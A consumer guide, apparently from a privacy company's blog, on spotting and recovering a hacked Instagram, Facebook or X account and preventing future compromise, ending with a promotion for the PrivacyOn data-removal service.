What to Do If Your Social Media Account Is Hacked

Realizing someone else has taken control of your social media account is unsettling. Whether it is Instagram, Facebook, X, or another platform, a hacked account puts your personal data, your reputation, and even your contacts at risk. The good news is that most accounts can be recovered if you act quickly and methodically. Here is exactly what to do.

Warning Signs Your Account Has Been Compromised

Sometimes a hack is immediately obvious -- you are locked out entirely. Other times the signs are more subtle. Watch for:

• Posts, stories, or reels you did not create: Spammy promotions, suspicious links, or offensive content appearing under your name
• Direct messages you did not send: Hackers often message your contacts with phishing links or requests for money while posing as you
• Login notifications from unknown locations: Alerts showing sign-ins from cities, countries, or devices you have never used
• Password or email change confirmations you did not initiate: A clear signal that someone is actively modifying your account
• Friends telling you something seems off: Contacts may notice suspicious activity before you do
• Unfamiliar connected apps or devices: New third-party apps granted access or devices listed in your active sessions

Step 1: Try to Log In and Change Your Password

If you can still access the account, change your password immediately. Choose a strong, unique password that is at least 16 characters long, using a mix of uppercase and lowercase letters, numbers, and symbols. Do not reuse a password from any other account.

If the hacker has already changed your password and you are locked out, use the platform's recovery process:

• Instagram: Tap "Get help logging in" on the login screen, or visit the Instagram Help Center and select "My account was hacked." Instagram can send a login link to your email or phone, or walk you through a selfie video verification process.
• Facebook: Go to facebook.com/hacked and follow the guided recovery flow. Facebook will ask you to identify your account and verify your identity through previously trusted contacts, a photo ID, or your recovery email.
• X (Twitter): Use the "Forgot password" flow from the login screen. If your email and phone have been changed, submit a support request through X's Help Center with details proving account ownership.

Step 2: Enable Two-Factor Authentication

Once you regain access, enable two-factor authentication (2FA) immediately. This adds a second verification step -- typically a code from an authenticator app -- every time someone logs in. Use an authenticator app like Google Authenticator or Authy rather than SMS-based codes, since text messages can be intercepted through SIM-swapping attacks.

If 2FA was already enabled and the hacker still got in, they may have compromised your authenticator or used a session hijacking technique. In that case, reset your 2FA setup entirely and generate new backup codes.

Step 3: Verify Your Recovery Email and Phone Number

Hackers often add their own recovery information so they can regain access later, even after you change your password. Go to your account's security settings and check:

• Recovery email addresses -- remove any you do not recognize
• Recovery phone numbers -- make sure only your number is listed
• Trusted contacts or backup methods -- verify each one is legitimate

Step 4: Review Connected Apps and Active Sessions

Check which third-party apps have permission to access your account and revoke access for anything you do not recognize or no longer use. Then review active sessions (logged-in devices) and log out of any unfamiliar ones. On most platforms you can find these settings under Security or Privacy.

Step 5: Secure Your Email Accounts

Your social media accounts are only as secure as the email address linked to them. If a hacker controls your email, they can reset your social media passwords at will. Change the password on every email account associated with your social media profiles, enable 2FA on those email accounts, and check for suspicious forwarding rules that might be silently sending copies of your messages to the attacker.

Step 6: Change Reused Passwords Everywhere

If you used the same password on your hacked social media account as on other services, change those passwords immediately. Credential stuffing -- where attackers try stolen username and password combinations across hundreds of sites -- is one of the most common ways a single breach cascades into multiple compromised accounts. A password manager makes it practical to use a unique password for every service.

Step 7: Scan Your Devices for Malware

The hack may have originated from malware on your computer or phone -- a keylogger capturing your credentials, for example. Run a full antivirus scan on every device you use to access social media. If malware is found, change your passwords again after the scan is complete so the new credentials are not immediately captured.

Step 8: Review Your Personal Data

Once the account is secured, assess what the hacker may have accessed:

• Payment information: If you had a credit card stored for ads or in-app purchases, check for unauthorized charges and consider requesting a new card number from your bank.
• Private messages: The hacker may have read or copied your DMs. If any messages contained sensitive information like addresses, financial details, or personal photos, take appropriate steps to protect yourself.
• Contact information: Warn your contacts that your account was compromised and that they should ignore any suspicious messages sent from your profile.

Step 9: Report the Hack

Report the compromise to the platform using their official reporting channels. Each major platform has a dedicated process for hacked accounts. Additionally, you can file a report with the Federal Trade Commission at ftc.gov, especially if you suspect identity theft or financial fraud. If money was stolen, also file a report with your local police department and with the FBI's Internet Crime Complaint Center (IC3).

Preventing Future Hacks

Once you have recovered, put these safeguards in place to reduce the risk of another compromise:

• Use unique passwords for every account: This is the single most effective step. One breached password should never unlock multiple accounts.
• Keep 2FA enabled at all times: Authenticator app-based 2FA blocks the vast majority of unauthorized login attempts.
• Be skeptical of messages and links: Phishing remains the primary attack vector. Never enter your credentials on a page you reached by clicking a link in a DM, email, or text message.
• Audit your accounts quarterly: Review connected apps, active sessions, and privacy settings every few months. Platforms change their defaults frequently.
• Reduce your data exposure: The less personal information available about you online, the harder it is for attackers to guess security questions, craft convincing phishing messages, or impersonate you.

Reduce Your Exposure with PrivacyOn

Social media hacks often start with personal information that attackers find through data brokers -- your email addresses, phone numbers, past addresses, and more. This data fuels phishing campaigns and helps criminals answer security questions or impersonate you convincingly.

PrivacyOn removes your personal information from over 100 data broker sites and provides 24/7 dark web monitoring to alert you when your credentials appear in breaches. By shrinking your digital footprint, you make it significantly harder for attackers to target you in the first place. Combined with the security steps above, PrivacyOn helps you build a layered defense that goes well beyond a strong password.